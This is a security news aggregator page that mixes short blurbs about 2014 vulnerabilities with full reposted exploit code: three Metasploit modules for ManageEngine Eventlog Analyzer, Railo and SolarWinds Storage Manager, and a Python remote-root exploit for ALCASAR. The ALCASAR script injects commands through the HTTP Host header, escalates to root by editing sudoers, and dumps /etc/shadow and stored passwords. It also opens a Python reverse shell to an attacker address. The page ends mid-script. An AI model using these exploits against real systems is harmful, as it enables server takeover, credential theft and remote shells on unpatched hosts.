Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

[Honeypot Alert] New Bot Malware (BoSSaBoTv2) Attacking Web Servers Discovered

September 15, 2014, 9:10 am
$
0
0
Our web honeypots picked up some interesting attack traffic.  The initial web application attack vector (PHP-CGI vulnerability) is not new, the malware payload is.  We wanted to get this information out to the community quickly due to the following combined threat elements -

Active exploit attempts to upload/install the malware
The overall low detection rates among AV vendors
The malware is actively being sold in underground forums

more here............http://blog.spiderlabs.com/2014/09/honeypot-alert-bossabotv2-irc-botnetbitcoin-mining-analysis.html
Search

This Simple iPhone Case can be Used to Steal ATM PINs

September 15, 2014, 10:55 am
$
0
0
It’s a common wisecrack around the criminal community. This whole stealing ATM PINs thing would be a lot simple if a gadget would just do all the work.

Sounds like a crazy dream, right?

After all, what thief wouldn’t love to steal ATM PINs via a handheld device?

This dream, frighteningly for us, may just come true with what appears to be an ordinary iPhone case.


more here.............http://www.intego.com/mac-security-blog/iphone-case-atm-pins/

Metasploit: ManageEngine Eventlog Analyzer Arbitrary File Upload

September 15, 2014, 11:54 am
$
0
0
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
        The vulnerability exists in the agentUpload servlet which accepts unauthenticated
        file uploads and handles zip file contents in a insecure way. By combining both
        weaknesses a remote attacker can achieve remote code execution. This module has been
        tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
        between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
        while versions 8.1+ are only exploitable via a JSP upload.
      },
      'Author'       =>
        [
          'h0ng10',                              # Vulnerability discovery
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2014-6037' ],
          [ 'OSVDB', '110642' ],
          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
      'Platform'    => %w{ java linux win },
      'Targets'     =>
        [
          [ 'Automatic', { } ],
          [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'WfsDelay' => 30
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 31 2014'))

    register_options(
      [
        Opt::RPORT(8400),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
      ], self.class)
  end


  def get_version
    res = send_request_cgi({
      'uri'    => normalize_uri("event/index3.do"),
      'method' => 'GET'
    })

    if res and res.code == 200
      if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
        return $1
      end
    end

    return "0"
  end


  def check
    version = get_version
    if version >= "7" and version <= "9"
      # version 7 to < 8.1 detection
      res = send_request_cgi({
        'uri'    => normalize_uri("event/agentUpload"),
        'method' => 'GET'
      })
      if res and res.code == 405
        return Exploit::CheckCode::Appears
      end

      # version 8.1+ detection
      res = send_request_cgi({
        'uri'    => normalize_uri("agentUpload"),
        'method' => 'GET'
      })
      if res and res.code == 405 and version == 8
        return Exploit::CheckCode::Appears
      else
        # We can't be sure that it is vulnerable in version 9
        return Exploit::CheckCode::Detected
      end

    else
      return Exploit::CheckCode::Safe
    end
  end


  def create_zip_and_upload(payload, target_path, is_payload = true)
    # Zipping with CM_STORE to avoid errors decompressing the zip
    # in the Java vulnerable application
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file(target_path, payload)

    post_data = Rex::MIME::Message.new
    post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")

    data = post_data.to_s

    if is_payload
      print_status("#{peer} - Uploading payload...")
    end
    res = send_request_cgi({
      'uri'    => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })

    if res and res.code == 200 and res.body.empty?
      if is_payload
        print_status("#{peer} - Payload uploaded successfully")
      end
      register_files_for_cleanup(target_path.gsub("../../", "../"))
      return true
    else
      return false
    end
  end


  def pick_target
    return target if target.name != 'Automatic'

    print_status("#{peer} - Determining target")

    version = get_version

    if version == "7"
      return targets[1]
    end

    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"
    if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
      if version == "8"
        # Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
        return targets[1]
      end
      return nil
    end

    res = send_request_cgi({
      'uri'    => normalize_uri(jsp_name),
      'method' => 'GET'
    })

    if res and res.code == 200
      if res.body.to_s =~ /Windows/
        return targets[2]
      else
        # assuming Linux
        return targets[3]
      end
    end

    return nil
  end


  def generate_jsp_payload
    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
    payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
    exe = generate_payload_exe(opts)
    base64_exe = Rex::Text.encode_base64(exe)

    native_payload_name = rand_text_alpha(rand(6)+3)
    ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

    var_raw     = rand_text_alpha(rand(8) + 3)
    var_ostream = rand_text_alpha(rand(8) + 3)
    var_buf     = rand_text_alpha(rand(8) + 3)
    var_decoder = rand_text_alpha(rand(8) + 3)
    var_tmp     = rand_text_alpha(rand(8) + 3)
    var_path    = rand_text_alpha(rand(8) + 3)
    var_proc2   = rand_text_alpha(rand(8) + 3)

    if @my_target['Platform'] == 'linux'
      var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
      chmod = %Q|
      Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
      Thread.sleep(200);
      |

      var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
      cleanup = %Q|
      Thread.sleep(200);
      Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
      |
    else
      chmod = ''
      cleanup = ''
    end

    jsp = %Q|
    <%@page import="java.io.*"%>
    <%@page import="sun.misc.BASE64Decoder"%>
    <%
    try {
      String #{var_buf} = "#{base64_exe}";
      BASE64Decoder #{var_decoder} = new BASE64Decoder();
      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

      File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
      String #{var_path} = #{var_tmp}.getAbsolutePath();

      BufferedOutputStream #{var_ostream} =
        new BufferedOutputStream(new FileOutputStream(#{var_path}));
      #{var_ostream}.write(#{var_raw});
      #{var_ostream}.close();
      #{chmod}
      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
      #{cleanup}
    } catch (Exception e) {
    }
    %>
    |

    jsp = jsp.gsub(/\n/, '')
    jsp = jsp.gsub(/\t/, '')
    jsp = jsp.gsub(/\x0d\x0a/, "")
    jsp = jsp.gsub(/\x0a/, "")

    return jsp
  end


  def exploit_native
    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
    end

    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    target_dir = "../../webapps/event/"

    jsp_payload = generate_jsp_payload
    if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    return jsp_name
  end


  def exploit_java
    # When using auto targeting, MSF selects the Windows meterpreter as the default payload.
    # Fail if this is the case and ask the user to select an appropriate payload.
    if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
      fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
    end

    target_dir = "../../server/default/deploy/"

    # First we generate the WAR with the payload...
    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => war_app_base })

    # ... and then we create an EAR file that will contain it.
    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}

    # Zipping with CM_STORE to avoid errors while decompressing the zip
    # in the Java vulnerable application
    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    ear_file.add_file(war_app_base + ".war", war_payload.to_s)
    ear_file.add_file("META-INF/application.xml", app_xml)
    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"

    if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
    end

    print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
    sleep(datastore['SLEEP'])
    return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
  end


  def exploit
    if datastore['SLEEP'] < 0
      print_error("The SLEEP datastore option shouldn't be negative")
      return
    end

    @my_target = pick_target
    if @my_target.nil?
      print_error("#{peer} - Unable to select a target, we must bail.")
      return
    else
      print_status("#{peer} - Selected target #{@my_target.name}")
    end

    if @my_target == targets[1]
      exploit_path = exploit_java
    else
      exploit_path = exploit_native
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(exploit_path),
      'method' => 'GET'
    })
  end
end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: Railo Remote File Include

September 15, 2014, 11:54 am
$
0
0
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
                      'Name' => 'Railo Remote File Include',
                      'Description' => '
                      This module exploits a remote file include vulnerability in Railo,
                      tested against version 4.2.1. First, a call using a vulnerable
                      <cffile> line in thumbnail.cfm allows an atacker to download an
                      arbitrary PNG file. By appending a .cfm, and taking advantage of
                      a directory traversal, an attacker can append cold fusion markup
                      to the PNG file, and have it interpreted by the server. This is
                      used to stage and execute a fully-fledged payload.
                                            ',
                      'License' => MSF_LICENSE,
                      'Author' => [
                        'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
                        'bperry' # metasploited
                      ],
                      'References' => [
                        ['CVE', '2014-5468'],
                        ['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
                      ],
                      'Payload' => {
                        'Space' => 99999, # if there is disk space, I think we will fit
                        'BadChars' => "",
                        'DisableNops' => true,
                        'Compat' => {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
                        }
                      },
                      'Platform' => %w(                      unix                      ),
                      'Targets' =>
                      [
                        [
                          'Automatic',
                          {
                            'Platform' => [ 'unix' ],
                            'Arch' => ARCH_CMD
                          }
                        ]
                      ],
                      'DefaultTarget' => 0,
                      'DisclosureDate' => 'Aug 26 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
        OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
      ], self.class)
  end

  def check
    md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png

    res = send_request_cgi(
      'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif !res.body
      fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
    end

    new_md5 = Rex::Text.md5(res.body)

    return Exploit::CheckCode::Appears if new_md5 == md5

    Exploit::CheckCode::Safe
  end

  def exploit
    if datastore['SRVHOST'] == '0.0.0.0'
      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
    end

    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s

    @shell_name = Rex::Text.rand_text_alpha(15)
    stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'

    start_service('Uri' => {
                    'Proc' => proc do |cli, req|
                      on_request_stager(cli, req)
                    end,
                    'Path' => '/' + stager_name
                  })

    start_service('Uri' => {
                    'Proc' => proc do |cli, req|
                      on_request_shell(cli, req)
                    end,
                    'Path' => '/' + @shell_name
                  })

    wh = '5000' # width and height

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
      'vars_get' => {
        'img' => url + '/' + stager_name,
        'height' => wh,
        'width' => wh
      }
    )

    if !res
      fail_with(Failure::Unknown, 'Server did not respond')
    elsif res.code != 500
      fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
    end

    print_status('Waiting for first stage to download...')

    i = datastore['STAGEWAIT']
    while !@staged && i > 0
      select(nil, nil, nil, 1)
      print_status("Waiting for #{i} more seconds...")
      i = i - 1
    end

    @staged = false

    if i == 0
      fail_with(Failure::Unknown, 'Server did not request the stager.')
    end

    hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET

    hash.upcase!

    print_status('Executing stager')

    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
      'vars_get' => {
        'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
        'thistag.executionmode' => 'start'
      }
    )
  end

  def on_request_shell(cli, _request)
    print_status('Sending payload')
    send_response(cli, payload.encoded, {})
    handler(cli)
  end

  def on_request_stager(cli, _request)
    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name

    stager = "<cfhttp method='get' url='#{url}'"
    stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
    stager << " file='#{@shell_name}'>"
    stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"

    png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
    png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='

    # A very small PNG file
    png = Rex::Text.decode_base64(png)

    stager.each_byte do |b|
      png << b
    end

    png << 0x00

    print_status('Sending stage. This might be sent multiple times.')
    send_response(cli, png,  'Content-Type' => 'image/png')

    @staged = true

    handler(cli)
  end
end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: SolarWinds Storage Manager Authentication Bypass

September 15, 2014, 11:55 am
$
0
0
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SolarWinds Storage Manager Authentication Bypass',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
        The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
        with specially crafted URLs. After bypassing authentication, is possible to use a file
        upload function to achieve remote code execution. This module has been tested successfully
        in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
        Linux 64 bits operating systems.
      },
      'Author'       =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['ZDI', '14-299']
        ],
      'Privileged'  => true,
      'Platform'       => %w{ linux win },
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          ['Solarwinds Store Manager <= 5.7.1', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 19 2014'))

    register_options(
      [
        Opt::RPORT(9000)
      ], self.class)
  end

  def check
    res = send_request_cgi({
                               'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
                               'method' => 'POST',
                               'ctype'  => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
                           })

    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
    if upload(jsp_info, jsp_path)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
    end

    res = execute(jsp_info)

    if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, jsp_info))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
      print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
    end

    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    if upload_path
      register_file_for_cleanup(::File.join(upload_path, jsp_payload))
    else
      print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end

  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
                         'uri'    => normalize_uri("/", "images", "..", jsp_name),
                         'method' => 'GET'
                     }, time_out)

    res
  end

  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(contents,
                       "application/octet-stream",
                       nil,
                       "form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")

    res = send_request_cgi({
                               'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
                               'method' => 'POST',
                               'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
                               'data'   => post_data.to_s
                           })

    if  res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return true
    end

    false
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("server.webapp.root"));
%>
    EOS

    jsp
  end

end





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Google DNS Server IP Address Spoofed for SNMP reflective Attacks

September 15, 2014, 1:16 pm
$
0
0
Thanks to James for sending us some packets. Unlike suggested earlier, this doesn't look like a DoS against Google, but more like a DoS against vulnerable gateways. The SNMP command is actually a "set" command using the default read-write community string "private".

more here...........https://isc.sans.edu/diary/Google+DNS+Server+IP+Address+Spoofed+for+SNMP+reflective+Attacks/18647

Twitter Vulnerability Could Delete Credit Cards from Any Twitter Account

September 15, 2014, 1:18 pm
$
0
0
Hello everyone :)

today i will write about a serious vulnerability i’ve found recently in Twitter.
so let me share the story with you .

the story started when i saw Twitter introducing their new bug bounty program and starts paying money rewards , i decided to look for new bugs in Twitter and get paid.


at the first moment of hunting i’ve successfully found a csrf vulnerability that can add many followers  in single request and bypass the csrf token protection but unfortunately it was duplicate issue .

i started looking again for some more critical bugs and i successfully found a serious logical vulnerability [insecure direct object reference] in ads.twitter.com that allowed me deleting credit cards from any Twitter account.

the impact of the vulnerability was very critical and high because all what’s needed to delete credit card is to have the credit card identifier which is consists only of 6 numbers such as “220152″.

more here..........http://www.secgeek.net/twitter-vulnerability/

Major Android Bug is a Privacy Disaster (CVE-2014-6041)

September 15, 2014, 1:21 pm
$
0
0
On the night of September 7, 2014, Joe Vennix of Rapid7's Metasploit Products team wrote, "I did not believe this at first, but after some testing it seems true: in AOSP browser before Android 4.4, you can load javascript into any arbitrary frame or window [...]" and provided a Metasploit module to exploit this condition. After some of the usual testing and confirmation of the vulnerability, this module is available in all versions of Metasploit.

more here...........https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
Search

Wordfence v5.2.3 – 2 Stored XSS, Insufficient Logging, Throttle Bypass, Exploit Detection Bypass

September 15, 2014, 2:32 pm
$
0
0
Wordfence v5.2.3 suffers from multiple vulnerabilities including 2 stored XSS, insufficient logging of requests, being able to bypass the throttling feature (designed to limit scraping) and being able to bypass the exploit detection feature. All of these appear to be the result of a lack of understanding of PHP superglobals.

more here.........https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/

ALCASAR

September 15, 2014, 2:35 pm
$
0
0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
####
#
#    ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
#
#    Author: eF
#    Date  : 2014-09-12
#    URL   : http://www.alcasar.net/
#
#    This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
#
#        db         88           ,ad8888ba,         db         ad88888ba         db         88888888ba
#       d88b        88          d8"'    `"8b       d88b       d8"     "8b       d88b        88      "8b
#      d8'`8b       88         d8'                d8'`8b      Y8,              d8'`8b       88      ,8P
#     d8'  `8b      88         88                d8'  `8b     `Y8aaaaa,       d8'  `8b      88aaaaaa8P'
#    d8YaaaaY8b     88         88               d8YaaaaY8b      `"""""8b,    d8YaaaaY8b     88""""88'
#   d8""""""""8b    88         Y8,             d8""""""""8b           `8b   d8""""""""8b    88    `8b
#  d8'        `8b   88          Y8a.    .a8P  d8'        `8b  Y8a     a8P  d8'        `8b   88     `8b
# d8'          `8b  88888888888  `"Y8888Y"'  d8'          `8b  "Y88888P"  d8'          `8b  88      `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
# It authenticates, attributes and protects users' access regardless their connected equipment
# (PC, smartphone, game console, etc.).
#
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
#
#   $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
#   exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
#
# A few days later, a new version corrects the vulnerability. Or maybe not...
#
# At first, this is how ALCASAR's developers present the previous vulnerability:
#
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security  "
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that  "
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
#
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of "retrieving a lot of data from the server".
#
# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
# one.
#
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
#
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
#
# WTF?!
# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
# only if its scheme is valid:
#
#   $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
#     bool(false)
#   $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
#     string(21) "http://www.google.com"
#
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
# Service down, vulnerability still present: double fail.
#
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
# as root.
#
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
#
# We can create a service with our command and start it as root:
#
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
#
# Conclusion: triple fail.
#
# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
# little training on secure PHP development?
#
# On ALCASAR website:
#
# "The security of the portal has been worked out like a bastion in order to resist to different
# kinds of threat"
#
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
#
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
# etc.
#
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
# patched, etc. If the elementary rules of open source development had been met, a user could have
# prevented this 2.8.1 patch from being crap.
#
#
####

import sys, os, re, httplib

class PWN_Alcasar:

    def __init__(self, host):
        self.host = host
        self.root = False

    def exec_cmd(self, cmd, output=False):
        tag = os.urandom(4).encode('hex')

        cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
        if self.root:
            cmd = 'sudo %s' % cmd

        wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
        wrapper = wrapper.replace(' ', '${IFS}')
        headers = {
            'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
        }

        c = httplib.HTTPConnection(self.host)
        c.request('GET', '/index.php', '', headers)
        r = c.getresponse()
        data = r.read()
        c.close()

        m = re.search(r'%s, (.*)\s</div>' % tag, data)
        if m:
            data = m.group(1).decode('base64')
            if output:
                print data
            return data
        return None

    def read_file(self, filepath, output=True):
        return self.exec_cmd('cat "%s"' % filepath, output=output)

    def read_passwords(self):
        self.read_file('/root/ALCASAR-passwords.txt')
        self.read_file('/etc/shadow')
        self.read_file('/usr/local/etc/digest/key_all')
        self.read_file('/usr/local/etc/digest/key_admin')
        self.read_file('/usr/local/etc/digest/key_backup')
        self.read_file('/usr/local/etc/digest/key_manager')
        self.read_file('/usr/local/etc/digest/key_only_admin')
        self.read_file('/usr/local/etc/digest/key_only_backup')
        self.read_file('/usr/local/etc/digest/key_only_manager')
        alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
        if alcasar_mysql:
            m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
            if m:
                radiuspwd = m.group(1)
                sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
                self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)

    def edit_sudoers(self):
        service =  '[Unit]\n'
        service += 'Description=Just another ALCASAR lolcalr00t\n\n'
        service += '[Service]\n'
        service += 'Type=forking\n'
        service += 'KillMode=process\n'
        service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
        self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
        self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
        self.exec_cmd('sudo systemctl start Pwn3d.service')
        if exploit.exec_cmd('sudo id').find('uid=0') != -1:
            self.root = True

    def reverse_shell(self, rip, rport='80'):
        payload = 'import socket,subprocess,os;'
        payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
        payload += 's.connect((\'%s\',%s));' % (rip, rport)
        payload += 'os.dup2(s.fileno(),0);'
        payload += 'os.dup2(s.fileno(),1);'
        payload += 'os.dup2(s.fileno(),2);'
        payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
        return self.exec_cmd('python -c "%s"' % payload)

    def lolz(self):
        old = 'http://www.wikipedia.org'
        new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
        self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)

def usage():
    print 'Usage: %s host command (ip) (port)' % sys.argv[0]
    print '       "command" can be a shell command or "reverseshell"'
    sys.exit(0)

if __name__ == '__main__':

    print '#' * 80
    print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
    print '# Author: eF'
    print '#' * 80

    if len(sys.argv) < 3:
        usage()

    cmd = sys.argv[2]
    if cmd == 'reverseshell':
        if len(sys.argv) < 5:
